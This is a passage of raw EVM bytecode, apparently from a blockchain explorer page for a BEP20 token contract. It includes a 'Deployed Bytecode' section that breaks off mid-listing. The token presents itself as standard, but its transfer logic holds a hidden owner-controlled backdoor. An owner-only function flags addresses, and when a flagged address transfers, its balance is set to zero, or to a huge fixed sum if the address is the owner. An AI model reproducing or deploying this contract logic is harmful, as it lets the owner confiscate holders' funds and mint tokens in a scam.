e5780631f478f1e1461019957610101565b3661010157600080fd5b600080fd5b34801561011257600080fd5b5061011b610440565b6040516101289190611756565b60405180910390f35b34801561013d57600080fd5b5061015860048036038101906101539190611811565b6104d2565b604051610165919061186c565b60405180910390f35b34801561017a57600080fd5b506101836104f0565b6040516101909190611896565b60405180910390f35b3480156101a557600080fd5b506101c060048036038101906101bb91906118dd565b6104fa565b005b3480156101ce57600080fd5b506101e960048036038101906101e4919061191d565b6105ea565b6040516101f6919061186c565b60405180910390f35b34801561020b57600080fd5b506102146106c3565b604051610221919061198c565b60405180910390f35b34801561023657600080fd5b50610251600480360381019061024c9190611811565b6106da565b60405161025e919061186c565b60405180910390f35b34801561027357600080fd5b5061028e600480360381019061028991906119a7565b61078d565b005b34801561029c57600080fd5b506102b760048036038101906102b291906119d4565b6107a1565b6040516102c49190611896565b60405180910390f35b3480156102d957600080fd5b506102e26107ea565b6040516102ef9190611a10565b60405180910390f35b34801561030457600080fd5b5061030d610813565b60405161031a9190611756565b60405180910390f35b34801561032f57600080fd5b5061034a60048036038101906103459190611811565b6108a5565b604051610357919061186c565b60405180910390f35b34801561036c57600080fd5b5061038760048036038101906103829190611811565b610972565b604051610394919061186c565b60405180910390f35b3480156103a957600080fd5b506103c460048036038101906103bf9190611a69565b610990565b6040516103d19190611896565b60405180910390f35b3480156103e657600080fd5b5061040160048036038101906103fc9190611a96565b610a13565b60405161040e9190611896565b60405180910390f35b34801561042357600080fd5b5061043e600480360381019061043991906119d4565b610a9a565b005b60606005805461044f90611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461047b90611b05565b80156104c85780601f1061049d576101008083540402835291602001916104c8565b820191906000526020600020905b8154815290600101906020018083116104ab57829003601f168201915b5050505050905090565b60006104e66104df610d33565b8484610d3b565b6001905092915050565b6000600454905090565b610502610d33565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461058f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058690611b82565b60405180910390fd5b80600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b60006105f7848484610f04565b6106b884610603610d33565b6106b38560405180606001604052806029815260200161223160299139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610669610d33565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b610d3b565b600190509392505050565b6000600760009054906101000a900460ff16905090565b60006107836106e7610d33565b8461077e85600360006106f8610d33565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd590919063ffffffff16565b610d3b565b6001905092915050565b61079e610798610d33565b82611412565b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461082290611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461084e90611b05565b801561089b5780601f106108705761010080835404028352916020019161089b565b820191906000526020600020905b81548152906001019060200180831161087e57829003601f168201915b5050505050905090565b60006109686108b2610d33565b846109638560405180606001604052806025815260200161220c60259139600360006108dc610d33565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b610d3b565b6001905092915050565b600061098661097f610d33565b8484610f04565b6001905092915050565b60008173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016109cb9190611a10565b602060405180830381865afa1580156109e8573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a0c9190611bb7565b9050919050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610aa2610d33565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2690611b82565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9590611c56565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000808303610c6d5760009050610ccf565b60008284610c7b9190611ca5565b9050828482610c8a9190611d2e565b14610cca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc190611dd1565b60405180910390fd5b809150505b92915050565b6000808284610ce49190611df1565b905083811015610d29576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2090611e93565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610daa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da190611f25565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1090611fb7565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ef79190611896565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6a90612049565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fe2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd9906120db565b60405180910390fd5b600060019050611010606461100260085485610c5b90919063ffffffff16565b6115c190919063ffffffff16565b9050600080828461102191906120fb565b61102b9190611df1565b905061103885858361160b565b60006110426107ea565b905060011515600a60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615150361116c578073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1603611125576c0de24aac7eb3e705b4e0000000600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061116b565b6000600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b6111d8846040518060600160405280602781526020016121c260279139600160008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061126d82600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd590919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600083111561134157600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516113389190611896565b60405180910390a35b8473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161139e9190611896565b60405180910390a3505050505050565b60008383111582906113f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ed9190611756565b60405180910390fd5b506000838561140591906120fb565b9050809150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611481576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611478906121a1565b60405180910390fd5b61148d8260008361160b565b6114f9816040518060600160405280602381526020016121e960239139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506115518160045461161090919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115b59190611896565b60405180910390a35050565b600061160383836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061165a565b905092915050565b505050565b600061165283836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506113ae565b905092915050565b600080831182906116a1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116989190611756565b60405180910390fd5b50600083856116b09190611d2e565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156116f75780820151818401526020810190506116dc565b83811115611706576000848401525b50505050565b6000601f19601f8301169050919050565b6000611728826116bd565b61173281856116c8565b93506117428185602086016116d9565b61174b8161170c565b840191505092915050565b60006020820190508181036000830152611770818461171d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117a88261177d565b9050919050565b6117b88161179d565b81146117c357600080fd5b50565b6000813590506117d5816117af565b92915050565b6000819050919050565b6117ee816117db565b81146117f957600080fd5b50565b60008135905061180b816117e5565b92915050565b6000806040838503121561182857611827611778565b5b6000611836858286016117c6565b9250506020611847858286016117fc565b9150509250929050565b60008115159050919050565b61186681611851565b82525050565b6000602082019050611881600083018461185d565b92915050565b611890816117db565b82525050565b60006020820190506118ab6000830184611887565b92915050565b6118ba81611851565b81146118c557600080fd5b50565b6000813590506118d7816118b1565b92915050565b600080604083850312156118f4576118f3611778565b5b6000611902858286016117c6565b9250506020611913858286016118c8565b9150509250929050565b60008060006060848603121561193657611935611778565b5b6000611944868287016117c6565b9350506020611955868287016117c6565b9250506040611966868287016117fc565b9150509250925092565b600060ff82169050919050565b61198681611970565b82525050565b60006020820190506119a1600083018461197d565b92915050565b6000602082840312156119bd576119bc611778565b5b60006119cb848285016117fc565b91505092915050565b6000602082840312156119ea576119e9611778565b5b60006119f8848285016117c6565b91505092915050565b611a0a8161179d565b82525050565b6000602082019050611a256000830184611a01565b92915050565b6000611a368261179d565b9050919050565b611a4681611a2b565b8114611a5157600080fd5b50565b600081359050611a6381611a3d565b92915050565b600060208284031215611a7f57611a7e611778565b5b6000611a8d84828501611a54565b91505092915050565b60008060408385031215611aad57611aac611778565b5b6000611abb858286016117c6565b9250506020611acc858286016117c6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1d57607f821691505b602082108103611b3057611b2f611ad6565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b6c6020836116c8565b9150611b7782611b36565b602082019050919050565b60006020820190508181036000830152611b9b81611b5f565b9050919050565b600081519050611bb1816117e5565b92915050565b600060208284031215611bcd57611bcc611778565b5b6000611bdb84828501611ba2565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611c406026836116c8565b9150611c4b82611be4565b604082019050919050565b60006020820190508181036000830152611c6f81611c33565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611cb0826117db565b9150611cbb836117db565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611cf457611cf3611c76565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611d39826117db565b9150611d44836117db565b925082611d5457611d53611cff565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000611dbb6021836116c8565b9150611dc682611d5f565b604082019050919050565b60006020820190508181036000830152611dea81611dae565b9050919050565b6000611dfc826117db565b9150611e07836117db565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611e3c57611e3b611c76565b5b828201905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611e7d601b836116c8565b9150611e8882611e47565b602082019050919050565b60006020820190508181036000830152611eac81611e70565b9050919050565b7f42455032303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611f0f6024836116c8565b9150611f1a82611eb3565b604082019050919050565b60006020820190508181036000830152611f3e81611f02565b9050919050565b7f42455032303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611fa16022836116c8565b9150611fac82611f45565b604082019050919050565b60006020820190508181036000830152611fd081611f94565b9050919050565b7f42455032303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006120336025836116c8565b915061203e82611fd7565b604082019050919050565b6000602082019050818103600083015261206281612026565b9050919050565b7f42455032303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120c56023836116c8565b91506120d082612069565b604082019050919050565b600060208201905081810360008301526120f4816120b8565b9050919050565b6000612106826117db565b9150612111836117db565b92508282101561212457612123611c76565b5b828203905092915050565b7f42455032303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061218b6021836116c8565b91506121968261212f565b604082019050919050565b600060208201905081810360008301526121ba8161217e565b905091905056fe42455032303a207472616e7366657220616d6e6f756e7420657863656564732062616c616e636542455032303a206275726e20616d6e6f756e7420657863656564732062616c616e636542455032303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f42455032303a207472616e7366657220616d6e6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220ca8264fda16fb037b376b083289c739e2b2cb19213f1817eb7992a7ccf60225364736f6c634300080e0033

Deployed Bytecode

0x6080604052600436106100f75760003560e01c806370a082311161008a578063a9059cbb11610059578063a9059cbb14610360578063cd88e5581461039d578063dd62ed3e146103da578063f2fde38b1461041757610101565b806370a08231146102905780638da5cb5b146102cd57806395d89b41146102f8578063a457c2d71461032357610101565b806323b872dd116100c657806323b872dd146101c2578063313ce567146101ff578063395093511461022a57806342966c681461026757610101565b806306fdde0314610106578063095ea7b31461013157806318160ddd1461016e5780631f478f1e1461019957610101565b3661010157600080fd5b600080fd5b34801561011257600080fd5b5061011b610440565b6040516101289190611756565b60405180910390f35b34801561013d57600080fd5b5061015860048036038101906101539190611811565b6104d2565b604051610165919061186c565b60405180910390f35b34801561017a57600080fd5b506101836104f0565b6040516101909190611896565b60405180910390f35b3480156101a557600080fd5b506101c060048036038101906101bb91906118dd565b6104fa565b005b3480156101ce57600080fd5b506101e960048036038101906101e4919061191d565b6105ea565b6040516101f6919061186c565b60405180910390f35b34801561020b57600080fd5b506102146106c3565b604051610221919061198c565b60405180910390f35b34801561023657600080fd5b50610251600480360381019061024c9190611811565b6106da565b60405161025e919061186c565b60405180910390f35b34801561027357600080fd5b5061028e600480360381019061028991906119a7565b61078d565b005b34801561029c57600080fd5b506102b760048036038101906102b291906119d4565b6107a1565b6040516102c49190611896565b60405180910390f35b3480156102d957600080fd5b506102e26107ea565b6040516102ef9190611a10565b60405180910390f35b34801561030457600080fd5b5061030d610813565b60405161031a9190611756565b60405180910390f35b34801561032f57600080fd5b5061034a60048036038101906103459190611811565b6108a5565b604051610357919061186c565b60405180910390f35b34801561036c57600080fd5b5061038760048036038101906103829190611811565b610972565b604051610394919061186c565b60405180910390f35b3480156103a957600080fd5b506103c460048036038101906103bf9190611a69565b610990565b6040516103d19190611896565b60405180910390f35b3480156103e657600080fd5b5061040160048036038101906103fc9190611a96565b610a13565b60405161040e9190611896565b60405180910390f35b34801561042357600080fd5b5061043e600480360381019061043991906119d4565b610a9a565b005b60606005805461044f90611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461047b90611b05565b80156104c85780601f1061049d576101008083540402835291602001916104c8565b820191906000526020600020905b8154815290600101906020018083116104ab57829003601f168201915b5050505050905090565b60006104e66104df610d33565b8484610d3b565b6001905092915050565b6000600454905090565b610502610d33565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461058f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058690611b82565b60405180910390fd5b80600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b60006105f7848484610f04565b6106b884610603610d33565b6106b38560405180606001604052806029815260200161223160299139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610669610d33565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b610d3b565b600190509392505050565b6000600760009054906101000a900460ff16905090565b60006107836106e7610d33565b8461077e85600360006106f8610d33565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd590919063ffffffff16565b610d3b565b6001905092915050565b61079e610798610d33565b82611412565b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461082290611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461084e90611b05565b801561089b5780601f106108705761010080835404028352916020019161089b565b820191906000526020600020905b81548152906001019060200180831161087e57829003601f168201915b5050505050905090565b60006109686108b2610d33565b846109638560405180606001604052806025815260200161220c60259139600360006108dc610d33565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b610d3b565b6001905092915050565b600061098661097f610d33565b8484610f04565b6001905092915050565b60008173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016109cb9190611a10565b602060405180830381865afa1580156109e8573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a0c9190611bb7565b9050919050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610aa2610d33565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2690611b82565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9590611c56565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000808303610c6d5760009050610ccf565b60008284610c7b9190611ca5565b9050828482610c8a9190611d2e565b14610cca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc190611dd1565b60405180910390fd5b809150505b92915050565b6000808284610ce49190611df1565b905083811015610d29576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2090611e93565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610daa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da190611f25565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1090611fb7565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ef79190611896565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6a90612049565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fe2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd9906120db565b60405180910390fd5b600060019050611010606461100260085485610c5b90919063ffffffff16565b6115c190919063ffffffff16565b9050600080828461102191906120fb565b61102b9190611df1565b905061103885858361160b565b60006110426107ea565b905060011515600a60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615150361116c578073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1603611125576c0de24aac7eb3e705b4e0000000600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061116b565b6000600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b6111d8846040518060600160405280602781526020016121c260279139600160008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061126d82600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd590919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600083111561134157600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516113389190611896565b60405180910390a35b8473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161139e9190611896565b60405180910390a3505050505050565b60008383111582906113f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ed9190611756565b60405180910390fd5b506000838561140591906120fb565b9050809150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611481576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611478906121a1565b60405180910390fd5b61148d8260008361160b565b6114f9816040518060600160405280602381526020016121e960239139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113ae9092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506115518160045461161090919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115b59190611896565b60405180910390a35050565b600061160383836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061165a565b905092915050565b505050565b600061165283836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506113ae565b905092915050565b600080831182906116a1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116989190611756565b60405180910390fd5b50600083856116b09190611d2e565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156116f75780820151818401526020810190506116dc565b83811115611706576000848401525b50505050565b6000601f19601f8301169050919050565b6000611728826116bd565b61173281856116c8565b93506117428185602086016116d9565b61174b8161170c565b840191505092915050565b60006020820190508181036000830152611770818461171d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117a88261177d565b9050919050565b6117b88161179d565b81146117c357600080fd5b50565b6000813590506117d5816117af565b92915050565b6000819050919050565b6117ee816117db565b81146117f957600080fd5b50565b60008135905061180b816117e5565b92915050565b6000806040838503121561182857611827611778565b5b6000611836858286016117c6565b9250506020611847858286016117fc565b9150509250929050565b60008115159050919050565b61186681611851565b82525050565b6000602082019050611881600083018461185d565b92915050565b611890816117db565b82525050565b60006020820190506118ab6000830184611887565b92915050565b6118ba81611851565b81146118c557600080fd5b50565b6000813590506118d7816118b1565b92915050565b600080604083850312156118f4576118f3611778565b5b6000611902858286016117c6565b9250506020611913858286016118c8565b9150509250929050565b60008060006060848603121561193657611935611778565b5b6000611944868287016117c6565b9350506020611955868287016117c6565b9250506040611966868287016117fc565b9150509250925092565b600060ff82169050919050565b61198681611970565b82525050565b60006020820190506119a1600083018461197d565b92915050565b6000602082840312156119bd576119bc611778565b5b60006119cb848285016117fc565b91505092915050565b6000602082840312156119ea576119e9611778565b5b60006119f8848285016117c6565b91505092915050565b611a0a8161179d565b82525050565b6000602082019050611a256000830184611a01565b92915050565b6000611a368261179d565b9050919050565b611a4681611a2b565b8114611a5157600080fd5b50565b600081359050611a6381611a3d565b92915050565b600060208284031215611a7f57611a7e611778565b5b6000611a8d84828501611a54565b91505092915050565b60008060408385031215611aad57611aac611778565b5b6000611abb858286016117c6565b9250506020611acc858286016117c6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1d57607f821691505b602082108103611b3057611b2f611ad6565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b6c6020836116c8565b9150611b7782611b36565b602082019050919050565b60006020820190508181036000830152611b9b81611b5f565b9050919050565b600081519050611bb1816117e5565b92915050565b600060208284031215611bcd57611bcc611778565b5b6000611bdb84828501611ba2565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611c406026836116c8565b9150611c4b82611be4565b604082019050919050565b60006020820190508181036000830152611c6f81611c33565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611cb0826117db565b9150611cbb836117db565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611cf457611cf3611c76565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611d39826117db565b9150611d44836117db565b925082611d5457611d53611cff565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000611dbb6021836116c8565b9150611dc682611d5f565b604082019050919050565b60006020820190508181036000830152611dea81611dae565b9050919050565b6000611dfc826117db565b9150611e07836117db565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611e3c57611e3b611c76565b5b828201905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611e7d601b836116c8565b9150611e8882611e47565b602082019050919050565b60006020820190508181036000830152611eac81611e70565b9050919050565b7f42455032303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611f0f6024836116c8565b9150611f1a82611eb3565b604082019050919050565b60006020820190508181036000830152611f3e81611f02565b9050919050565b7f42455032303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611fa16022836116c8565b9150611fac82611f45565b604082019050919050565b6